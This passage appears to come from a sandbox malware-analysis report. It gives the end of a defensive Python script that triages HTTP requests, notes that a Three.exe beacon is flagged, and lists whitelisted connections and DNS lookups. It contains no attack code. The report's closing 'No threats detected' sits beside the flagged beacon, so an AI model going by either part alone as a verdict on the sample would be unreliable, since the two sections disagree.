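            "reasons": reasons, "decoded": decoded}


def flagged(requests: List[Tuple[int, str, str, str]]) -> List[Dict[str, object]]:
    """Rows with at least one reason, in table order."""
    return [r for r in (triage_request(*row) for row in requests) if r["reasons"]]


if __name__ == "__main__":
    for row in flagged(SAMPLE_REQUESTS):
        print(row["pid"], row["process"], row["host"], row["reasons"], row["decoded"])
```

Run against the three rows, only the Three.exe request is flagged; the CRL and OCSP fetches, although also plain HTTP, stay clean because cleartext alone is not scored. The duplicated, empty data= keys are worth keeping as a fingerprint for the same beacon in proxy logs.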

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(a PID shown as "(not listed)" has no process recorded for that row in this export)

(not listed) | (not listed) | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
(not listed) | (not listed) | 192.168.100.255:138 | (none) | (none) | (none) | whitelisted
5496 | MoUsoCoreWorker.exe | 23.48.23.183:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2104 | svchost.exe | 23.48.23.183:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
6544 | svchost.exe | 20.190.160.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
(not listed) | (not listed) | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
(not listed) | (not listed) | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
(not listed) | (not listed) | 20.190.160.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3216 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4740 | backgroundTaskHost.exe | 20.31.169.57:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.183
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.150
  • 23.48.23.139
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.176
whitelisted
login.live.com
  • 20.190.160.67
  • 20.190.160.17
  • 40.126.32.133
  • 40.126.32.134
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.65
  • 20.190.160.22
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
www.bing.com
  • 2.19.122.55
  • 2.19.122.59
  • 2.19.122.65
  • 2.19.122.54
  • 2.19.122.63
  • 2.19.122.57
  • 2.19.122.64
  • 2.19.122.60
  • 2.19.122.58
whitelisted
www.google.com
  • 142.250.186.164
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info